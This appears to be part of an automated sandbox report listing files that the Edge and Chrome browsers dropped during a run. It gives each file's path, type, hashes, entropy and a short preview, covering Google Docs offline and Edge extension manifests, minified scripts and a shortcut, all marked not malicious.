                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_707182528\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_707182528\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_707182528\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_707182528\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_707182528\e9cb0f59-ecea-4512-8c39-b3737b98084a.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.978396183624148
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8LdbTDvVH3idAKZdA19ehwiZUklqehv6y+3:8tXrpy
                                                                                                                                                                                                                                                                                                  MD5:3C4C90627172CA261B292B43DBE2C39E
                                                                                                                                                                                                                                                                                                  SHA1:2D06E8DF94364152DD2B01FC4030D6C27CEDD759
                                                                                                                                                                                                                                                                                                  SHA-256:82A0816A552A366DF22C09EA4CF22A034F6B90E571A48FC34D7273F7769C4577
                                                                                                                                                                                                                                                                                                  SHA-512:8E57B466D21A8D57B5E5E1E44F172131323B95A6B8CCFE66DCEB81E878BD78E2B2D0B3E7B63334E9923D85F512D1B6EB4FF116E36E55ECEA306E38D8DE318E61
                                                                                                                                                                                                                                                                                                  Malicious:false
